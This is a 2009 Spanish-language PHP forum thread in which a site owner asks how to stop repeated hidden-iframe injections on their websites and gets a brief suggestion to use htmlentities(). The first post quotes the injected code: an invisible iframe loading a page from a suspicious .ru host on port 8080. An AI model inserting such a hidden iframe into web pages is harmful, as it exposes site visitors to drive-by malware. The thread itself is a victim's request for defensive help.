Foros del Web » Programando para Internet » PHP »

Ataque por medio de iframes

Estas en el tema de Ataque por medio de iframes en el foro de PHP en Foros del Web. Hola, simplemente me gustaria saber si alguno le paso de ser atacados por medio de iframes y si hay solucion. El soporte de ******** me ...
  #1 (permalink)  
Antiguo 03/07/2009, 17:26
 
Fecha de Ingreso: diciembre-2002
Mensajes: 473
Antigüedad: 21 años, 4 meses
Puntos: 0
Ataque por medio de iframes

Hola, simplemente me gustaria saber si alguno le paso de ser atacados por medio de iframes y si hay solucion. El soporte de ******** me dice puede ser por fallas de inyeccion sq pero dudo de eso, ya que por ejemplo, en un sitio no tengo codigo que apunte a BD (fui atacado en dos, en uno de ellos ya varias veces, y dos en el mismo mes)
El ultimo iframe fue este:
Cita:
<iframe src="http://c5y.ru:8080/index.php" width=132 height=173 style="visibility: hidden"></iframe>
Agradeceria me pudieran ayudar ya que el soporte tecnico no da importancia a estos ataques.Gracias!
  #2 (permalink)  
Antiguo 03/07/2009, 17:47
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.734
Antigüedad: 14 años, 10 meses
Puntos: 1517
Respuesta: Ataque por medio de iframes

Puedes usar htmlentities() para evitar estos ataques. Lee este articulo para que te pueda ayudar en lo que te esta pasando

http://www.clubdesarrolladores.com/a...cho-s-get-var-
  #3 (permalink)  
Antiguo 06/07/2009, 13:19
 
Fecha de Ingreso: diciembre-2002
Mensajes: 473
Antigüedad: 21 años, 4 meses
Puntos: 0
Respuesta: Ataque por medio de iframes

Muchas gracias amigo, ese articulo esta buenisimo, ahora vere de buscar alguna buena funcion phpque pueda ayudarme pero realmente no termino de entender al 100% como entran, ya que hasta subcarpetas hackearon, pero lo raro es que no fueron todas. Ademas, ahora me fijare mejor, pero una de las paginas es bien estatica asi que estimo solo por el formulario de contactos puede ser que hayan entrado. Les dejo un abrazo y gracias desde ya cualquier otra idea!
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta

SíEste tema le ha gustado a 1 personas




La zona horaria es GMT -6. Ahora son las 12:07.